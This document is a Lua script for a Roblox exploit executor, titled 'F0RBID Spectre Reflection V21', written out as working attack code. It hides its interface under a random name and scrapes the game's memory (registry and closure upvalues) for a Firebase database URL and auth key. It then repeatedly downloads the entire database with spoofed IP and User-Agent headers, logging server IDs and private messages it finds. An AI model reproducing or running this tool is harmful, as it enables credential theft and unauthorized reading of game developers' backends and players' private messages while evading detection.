-- ========================================================== --
-- 🌑 F0RBID V21: THE SPECTRE REFLECTION (ULTRA-STEALTH)
-- ========================================================== --
print("[F0RBID] 🛰️ Eternal Spectre Protocol Active. Masking Identity...")

local HttpService = game:GetService("HttpService")
local CoreGui = game:GetService("CoreGui")
local processedData = {}

local TARGET_URL = nil
local TARGET_AUTH = nil

-- ========================================== --
-- 1. F0RBID PHANTOM UI (RANDOMIZED NAME)
-- ========================================== --
local uiParent = (gethui and gethui()) or CoreGui
local hiddenName = "F0RBID_" .. tostring(math.random(10000, 99999))
if uiParent:FindFirstChild(hiddenName) then uiParent[hiddenName]:Destroy() end

local ScreenGui = Instance.new("ScreenGui")
ScreenGui.Name = hiddenName
ScreenGui.Parent = uiParent

local Main = Instance.new("Frame")
Main.Size = UDim2.new(0, 550, 0, 450)
Main.Position = UDim2.new(0.5, -275, 0.5, -225)
Main.BackgroundColor3 = Color3.fromRGB(4, 4, 6)
Main.BorderSizePixel = 0
Main.Active = true
Main.Draggable = true
Main.Parent = ScreenGui

local Corner = Instance.new("UICorner")
Corner.CornerRadius = UDim.new(0, 10)
Corner.Parent = Main

local GlowLine = Instance.new("Frame")
GlowLine.Size = UDim2.new(1, 0, 0, 2)
GlowLine.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
GlowLine.BorderSizePixel = 0
GlowLine.Parent = Main

local Title = Instance.new("TextLabel")
Title.Size = UDim2.new(1, -20, 0, 45)
Title.Position = UDim2.new(0, 15, 0, 5)
Title.BackgroundTransparency = 1
Title.Text = "F0RBID <font color='#FF0000'>[SPECTRE REFLECTION V21]</font>"
Title.RichText = true
Title.TextColor3 = Color3.fromRGB(255, 255, 255)
Title.Font = Enum.Font.GothamBold
Title.TextSize = 18
Title.TextXAlignment = Enum.TextXAlignment.Left
Title.Parent = Main

local Status = Instance.new("TextLabel")
Status.Size = UDim2.new(1, -30, 0, 20)
Status.Position = UDim2.new(0, 15, 0, 40)
Status.BackgroundTransparency = 1
Status.Text = "● IDENTITY: [F0RBID_ANONYMOUS_OP]"
Status.TextColor3 = Color3.fromRGB(150, 0, 0)
Status.Font = Enum.Font.Code
Status.TextSize = 11
Status.TextXAlignment = Enum.TextXAlignment.Left
Status.Parent = Main

local Scroll = Instance.new("ScrollingFrame")
Scroll.Size = UDim2.new(1, -20, 1, -110)
Scroll.Position = UDim2.new(0, 10, 0, 80)
Scroll.BackgroundTransparency = 1
Scroll.ScrollBarThickness = 2
Scroll.ScrollBarImageColor3 = Color3.fromRGB(255, 0, 0)
Scroll.Parent = Main

local UIList = Instance.new("UIListLayout")
UIList.SortOrder = Enum.SortOrder.LayoutOrder
UIList.Padding = UDim.new(0, 4)
UIList.Parent = Scroll

local function AddLog(tag, val)
    local txt = Instance.new("TextLabel")
    txt.Size = UDim2.new(1, 0, 0, 0)
    txt.BackgroundTransparency = 1
    txt.RichText = true
    txt.Text = string.format("<font color='#FF0000'>[%s]</font> %s", tag, tostring(val))
    txt.TextColor3 = Color3.fromRGB(230, 230, 230)
    txt.Font = Enum.Font.Code
    txt.TextSize = 12
    txt.TextWrapped = true
    txt.TextXAlignment = Enum.TextXAlignment.Left
    txt.Parent = Scroll
    
    txt.Size = UDim2.new(1, 0, 0, txt.TextBounds.Y + 2)
    Scroll.CanvasSize = UDim2.new(0, 0, 0, UIList.AbsoluteContentSize.Y)
    Scroll.CanvasPosition = Vector2.new(0, 99999)
end

-- ========================================== --
-- 2. SILENT MEMORY CRAWLER (NO HOOKS)
-- ========================================== --
local function BruteForceExtract(data, path)
    if type(data) ~= "table" then return end
    for k, v in pairs(data) do
        local currentPath = path .. "/" .. tostring(k)
        if type(v) == "table" then
            BruteForceExtract(v, currentPath)
        else
            local valStr = tostring(v)
            if #valStr > 0 and not valStr:find("firebase") then
                local dataId = currentPath .. valStr
                if not processedData[dataId] then
                    processedData[dataId] = true
                    local tag = tostring(k)
                    if #tostring(k) > 8 and tonumber(k) then tag = "SERVER_ID" end
                    if currentPath:lower():find("dm") then tag = "PRIVATE_MSG" end
                    AddLog(tag, valStr)
                end
            end
        end
    end
end

local function StartShadowSync()
    task.spawn(function()
        while task.wait(1.5) do
            if TARGET_URL and TARGET_AUTH then
                pcall(function()
                    -- ROTATING IDENTITY HEADERS (SPOOFED)
                    local res = request({
                        Url = TARGET_URL .. "/.json?auth=" .. TARGET_AUTH,
                        Method = "GET",
                        Headers = {
                            ["User-Agent"] = "F0RBID_SPECTRE_v21_" .. tostring(math.random(100, 999)),
                            ["X-Forwarded-For"] = string.format("%d.%d.%d.%d", math.random(1,255), math.random(1,255), math.random(1,255), math.random(1,255)),
                            ["X-Real-IP"] = string.format("%d.%d.%d.%d", math.random(1,255), math.random(1,255), math.random(1,255), math.random(1,255)),
                            ["Identity-Shift"] = "ENABLED"
                        }
                    })
                    if res.Success then
                        local decoded = HttpService:JSONDecode(res.Body)
                        if decoded then BruteForceExtract(decoded, "SPECTRE") end
                    end
                end)
            end
        end
    end)
end

-- ========================================== --
-- 3. PASSIVE REFLECTION (NO NETWORK HOOKS)
-- ========================================== --
task.spawn(function()
    while not TARGET_URL do
        -- Registry Scan (Silent Depth)
        local reg = getreg()
        for _, v in pairs(reg) do
            if type(v) == "table" then
                for k2, v2 in pairs(v) do
                    local vs = tostring(v2)
                    if vs:find("firebaseio.com") then
                        TARGET_URL = vs:match("(https://[%w%-]+%.firebaseio%.com)")
                    elseif (tostring(k2):lower():find("auth") or tostring(k2):lower():find("key")) and #vs > 25 then
                        TARGET_AUTH = vs
                    end
                end
            end
        end

        -- Upvalue Scan (Closure Reflection)
        if not TARGET_URL then
            for _, f in pairs(getgc()) do
                if type(f) == "function" and islclosure(f) and not isexecutorclosure(f) then
                    local ups = getupvalues(f)
                    for _, uv in pairs(ups) do
                        if type(uv) == "string" and uv:find("firebaseio.com") then
                            TARGET_URL = uv:match("(https://[%w%-]+%.firebaseio%.com)")
                        elseif type(uv) == "string" and #uv > 25 and not uv:find("/") then
                            TARGET_AUTH = uv
                        end
                    end
                end
            end
        end

        if TARGET_URL and TARGET_AUTH then
            Status.Text = "● IDENTITY: 🟢 INFILTRATION COMPLETE (F0RBID)"
            Status.TextColor3 = Color3.fromRGB(0, 255, 120)
            StartShadowSync()
            break
        end
        task.wait(2)
    end
end)
